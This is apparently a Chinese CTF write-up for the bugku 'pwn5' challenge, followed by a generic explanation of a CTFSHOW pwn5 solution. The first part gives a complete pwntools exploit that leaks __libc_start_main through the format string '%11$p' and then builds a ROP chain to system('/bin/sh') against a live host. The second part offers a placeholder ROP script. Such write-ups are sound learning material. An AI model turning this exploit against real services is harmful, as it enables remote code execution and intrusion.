bugku-pwn5(萌新版)

0x20 正文

用ida打开,右键(具体是由于插件还是7.0自带的,不是很清楚)查找格式化字符串,确实有找到。

main函数分析

在main里发现printf,s长度是20h,但是只能读取8,则存在溢出,而printf的参数是一个地址,则表明是格式化字符串漏洞。

碰到格式化字符串漏洞,我们就需要找找我们输入的参数或者是已存在的内容在程序里的偏移。

本题没有给libc,我们就需要leak libc,在这里我们选择leak_start_main

从图中可以看到,我们在printf下断点后,在栈中发现了libc_start_main,这里它的偏移是0x28,原因是:我们要找的是一个东西距离我们输入的内容处的偏移,大家知道,64位程序的第一个参数是rdi,也就是说我们需要求这个main到rdi的距离,是0x30-8=0x28

则start_main是距离我们输入的参数位置处的第:0x28/8+6=11,因为一个内容八个字节,6个寄存器。

这里面libc_main在程序中的地址是:

通过./find __libc_start_main 740可以找到对应的libc,然后通过dump命令就可以找到sys以及binsh的偏移,然后与libc_base相加

libc_base = read_addr - offset

0x30 exp

#-*- coding:utf-8 -*-
from pwn import *
context(os='linux', arch='amd64', log_level='debug') 
p = remote('114.116.54.89',10005)
p.recvuntil("?\n")
payload = "%11$p"
p.sendline(payload)
p.recvline()
libc_addr_main = p.recvuntil("%11$p")[:-6]
libc_base = int(libc_addr_main,16)-0x20830
sys = libc_base+ 0x45390
bin_sh = libc_base + 0x18cd57
pop_rdi = 0x400933

p.recvuntil("?\n")
payload1 = "鸽子"+'a'+"真香"
payload1 = payload1.ljust(0x20,'a')
payload1 += 'b'*8+p64(pop_rdi)+p64(bin_sh)+p64(sys)
p.sendline(payload1)
p.interactive()

exp就不需要解释了,主要是要弄懂原理,格式化字符串漏洞(目前,指我做的题目中,能理解)还是不难的。

OK,结束。

另外还学到几点:

mv str1 str2 将str1的名字改为str2
chmod 777 file 给权限
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值